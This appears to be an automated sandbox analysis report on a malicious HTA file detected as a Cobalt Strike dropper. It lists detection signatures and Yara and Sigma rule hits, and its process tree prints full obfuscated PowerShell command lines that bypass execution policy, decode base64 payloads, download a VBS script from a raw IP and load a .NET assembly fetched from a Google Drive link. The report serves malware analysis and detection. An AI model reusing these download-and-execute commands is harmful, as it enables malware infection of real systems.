Edit tour
Windows
Analysis Report
greatthingswithgoodnewsgivenbygodthingsgreat.hta
Overview
General Information
Detection
Cobalt Strike
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Detected Cobalt Strike Beacon
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 4724 cmdline:
mshta.exe "C:\Users\ user\Deskt op\greatth ingswithgo odnewsgive nbygodthin gsgreat.ht a" MD5: 06B02D5C097C7DB1F109749C45F3F505) - powershell.exe (PID: 2836 cmdline:
"C:\Window s\SysTEM32 \winDOWspO WERSheLL\v 1.0\pOweRS heLl.ExE" "poWERShEL l -Ex bYPA ss -N OP -w 1 -C DEVICECrE DENtiaLDEP loymenT.EX e ; IeX($( iEx('[sySt em.TeXt.en COdIng]'+[ ChAr]58+[C hAr]0x3A+' utF8.geTSt RiNg([SyST eM.cOnveRt ]'+[CHar]0 x3a+[ChAR] 58+'FROMBA SE64sTRINg ('+[cHaR]3 4+'JExBTmY gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gPSAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICBhRGQtV FlwZSAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAtTWV tYmVyZEVma U5pVElvTiA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA nW0RsbEltc G9ydCgiVXJ sbU9OIiwgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgQ 2hhclNldCA 9IENoYXJTZ XQuVW5pY29 kZSldcHVib GljIHN0YXR pYyBleHRlc m4gSW50UHR yIFVSTERvd 25sb2FkVG9 GaWxlKElud FB0ciAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICBidEd sVWpzLHN0c mluZyAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICBjRFN GWUcsc3Rya W5nICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIGVEYWN ZeVRZWUNRL HVpbnQgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgQmt ab0UsSW50U HRyICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIEFqUXR iYXVIcWJUK TsnICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIC1OYU1 lICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICJVYlRic GlLZSIgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgLW5 BbWVTcEFjZ SAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CBEWlZyQVJ NZFdhaCAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAtU GFzc1RocnU 7ICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICRMQU5mO jpVUkxEb3d ubG9hZFRvR mlsZSgwLCJ odHRwOi8vM TkyLjMuMTc 2LjE0MS80M S9zaW1wbGV 0aGluZ3N3a XRoZ3JlYXR 0aGlnbnNna XZlbm1lYmV zdHRoaW5nc y50SUYiLCI kRU52OkFQU ERBVEFcc2l tcGxldGhpb mdzd2l0aGd yZWF0dGhpZ 25zZ2l2ZW5 tZWJlc3Qud mJTIiwwLDA pO1N0YVJ0L VNMZUVQKDM pO3N0YXJ0I CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CIkZW52OkF QUERBVEFcc 2ltcGxldGh pbmdzd2l0a GdyZWF0dGh pZ25zZ2l2Z W5tZWJlc3Q udmJTIg==' +[Char]34+ '))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 5676 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 3136 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Ex bYPAss -NOP -w 1 -C DEVICE CrEDENtiaL DEPloymenT .EXe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - csc.exe (PID: 2284 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\csc .exe" /noc onfig /ful lpaths @"C :\Users\us er\AppData \Local\Tem p\mkzphods \mkzphods. cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D) - cvtres.exe (PID: 5880 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE S81A3.tmp" "c:\Users \user\AppD ata\Local\ Temp\mkzph ods\CSC792 C8B6B522A4 65FA7FF7F3 1B8A0A9.TM P" MD5: 70D838A7DC5B359C3F938A71FAD77DB0) - wscript.exe (PID: 432 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\simpl ethingswit hgreatthig nsgivenmeb est.vbS" MD5: FF00E0480075B095948000BDC66E81F0) - powershell.exe (PID: 2764 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' JiggJHBTaG 9tZVsyMV0r JFBzaE9tZV szMF0rJ3gn KSAoICgoJ3 N3UmltYWdl VXJsID0gNW w3JysnaHR0 cHM6Ly8nKy dkcml2ZS5n b29nbGUuY2 9tL3VjP2V4 cG9ydD1kb3 dubG9hZCZp ZD0xQUlWZ0 pKSnYxRjZ2 UzRzVU95Ym 5ILXNEdlVo Qll3dXIgNW w3O3N3Undl YkNsaWVudC A9IE5ldy1P YmplY3QgU3 lzdGVtLk5l dC5XJysnZW JDbGllbnQ7 c3dSaW1hZ2 VCeXRlcyA9 IHN3UndlYk NsaWVudC5E b3dubG9hZE RhdGEoc3dS aW1hZ2VVcm wpO3N3Jysn UmltYWdlVG V4dCA9IFtT eXN0ZW0nKy cuVGV4dC5F bmNvZGluZ1 0nKyc6OlVU RjguR2V0U3 RyaW5nKHN3 UmltYWdlQn l0ZXMpO3N3 UnN0YXJ0Rm xhZyA9IDVs Nzw8QkEnKy dTRTY0X1NU QVJUPicrJz 41bDc7c3dS ZW5kRmxhZy A9IDVsNzw8 QkFTRTY0X0 VORD4+NWw3 O3N3UnMnKy d0YXJ0SW5k ZXggPSBzd1 JpbWFnZVRl eHQuSW5kZX hPZicrJyhz d1JzdGFydE ZsYWcpO3N3 UmVuZEluZG V4ID0gc3dS aW1hZ2VUJy snZXh0Lklu ZGV4T2Yoc3 dSZW5kRmxh Zyk7c3dSc3 RhcnRJJysn bmRleCAtZ2 UgMCAtYW5k IHMnKyd3Um VuZEluZGV4 IC1ndCBzd1 JzdGEnKydy dEluZGV4O3 N3UnN0YXJ0 SW5kZXggKz 0gc3dSc3Rh cnRGbGFnLk xlbmd0aDtz d1JiYXNlNj RMZW5ndGgg PSBzd1Jlbm RJbmRleCAt IHN3UnN0YX J0SW5kZXg7 c3dSYmFzZT Y0Q29tbWFu ZCA9IHN3Um ltYWdlVGV4 dC5TdWJzJy sndHJpbmco c3dSc3Rhcn RJbmRleCwg c3dSYmFzZT Y0TGVuZ3Ro KTtzd1JiYX NlNjRSZXZl cnNlZCA9IC 1qbycrJ2lu IChzd1JiYX NlNjRDb21t YW5kLlRvQ2 hhckFycmF5 KCcrJykgRn cxJysnICcr J0ZvckVhY2 gtT2JqZWN0 IHsgc3dSXy B9KVstMS4u LShzd1JiYX NlNjRDb21t YW5kLkxlbm d0aCldO3N3 UmNvbW1hbm RCeXRlcyA9 JysnIFtTeX N0ZW0uQ29u dmVydF06Ok Zyb21CYXNl NjRTdHJpbm coc3dSYmFz ZTY0UmV2ZX JzZWQpO3N3 UmxvYWRlZE Fzc2VtYmx5 ID0gW1N5c3 RlbS5SZWZs ZWN0aW9uLk Fzc2VtYmx5 XTo6TG9hZC hzd1Jjb21t YW5kQnl0ZX MpO3N3UnZh aU1ldGhvZC A9IFtkJysn bmxpYicrJy 5JTy5Ib21l XS5HZXRNZX Rob2QoNWw3 VkFJNWw3KT tzd1J2YWlN ZXRob2QuSW 52b2tlKHN3 Um51bGwsIE AoNWw3dHh0 LlRUUkxQTV MvMTQvMTQx LjY3MS4zLj I5MS8vOnB0 dGg1bDcsID VsN2Rlc2F0 aXZhZG81bD csIDVsN2Rl c2F0aXZhZG 81bDcsIDVs N2Rlc2F0aX ZhZG8nKyc1 bDcsICcrJz VsN2FzcG5l dF9yZWdicm 93c2VyczVs NywgNWw3ZC crJ2VzYXRp dmFkbzVsNy wgNWw3ZGVz YXRpdmFkbz VsNyw1bDdk ZXNhdGl2YW RvNWw3LDVs N2Rlc2F0aX ZhZG81bDcs NWw3ZGVzYX RpdmFkbzVs Nyw1bDdkZX NhdGl2YWRv NWw3LDVsN2 Rlc2F0aXZh ZG81bDcsNW w3MTVsNyw1 bDdkZXNhdG l2YWRvNWw3 KSk7JykgLX JlUExhY0Un NWw3JyxbY0 hhcl0zOSAt cmVQTGFjRS Anc3dSJyxb Y0hhcl0zNi AgLUNSZXBM QWNlICAnRn cxJyxbY0hh cl0xMjQpIC k=';$OWjux d = [syste m.Text.enc oding]::UT F8.GetStri ng([system .Convert]: :Frombase6 4String($c odigo));po wershell.e xe -window style hidd en -execut ionpolicy bypass -No Profile -c ommand $OW juxD MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 1992 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5896 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "&( $p Shome[21]+ $PshOme[30 ]+'x') ( ( ('swRimage Url = 5l7' +'https:// '+'drive.g oogle.com/ uc?export= download&i d=1AIVgJJJ v1F6vS4sUO ybnH-sDvUh BYwur 5l7; swRwebClie nt = New-O bject Syst em.Net.W'+ 'ebClient; swRimageBy tes = swRw ebClient.D ownloadDat a(swRimage Url);sw'+' RimageText = [System '+'.Text.E ncoding]'+ '::UTF8.Ge tString(sw RimageByte s);swRstar tFlag = 5l 7<<BA'+'SE 64_START>' +'>5l7;swR endFlag = 5l7<<BASE6 4_END>>5l7 ;swRs'+'ta rtIndex = swRimageTe xt.IndexOf '+'(swRsta rtFlag);sw RendIndex = swRimage T'+'ext.In dexOf(swRe ndFlag);sw RstartI'+' ndex -ge 0 -and s'+' wRendIndex -gt swRst a'+'rtInde x;swRstart Index += s wRstartFla g.Length;s wRbase64Le ngth = swR endIndex - swRstartI ndex;swRba se64Comman d = swRima geText.Sub s'+'tring( swRstartIn dex, swRba se64Length );swRbase6 4Reversed = -jo'+'in (swRbase6 4Command.T oCharArray ('+') Fw1' +' '+'ForE ach-Object { swR_ }) [-1..-(swR base64Comm and.Length )];swRcomm andBytes = '+' [Syste m.Convert] ::FromBase 64String(s wRbase64Re versed);sw RloadedAss embly = [S ystem.Refl ection.Ass embly]::Lo ad(swRcomm andBytes); swRvaiMeth od = [d'+' nlib'+'.IO .Home].Get Method(5l7 VAI5l7);sw RvaiMethod .Invoke(sw Rnull, @(5 l7txt.TTRL PMS/14/141 .671.3.291 //:ptth5l7 , 5l7desat ivado5l7, 5l7desativ ado5l7, 5l 7desativad o'+'5l7, ' +'5l7aspne t_regbrows ers5l7, 5l 7d'+'esati vado5l7, 5 l7desativa do5l7,5l7d esativado5 l7,5l7desa tivado5l7, 5l7desativ ado5l7,5l7 desativado 5l7,5l7des ativado5l7 ,5l715l7,5 l7desativa do5l7));') -rePLacE' 5l7',[cHar ]39 -rePLa cE 'swR',[ cHar]36 -C RepLAce 'F w1',[cHar] 124) )" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | ||
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |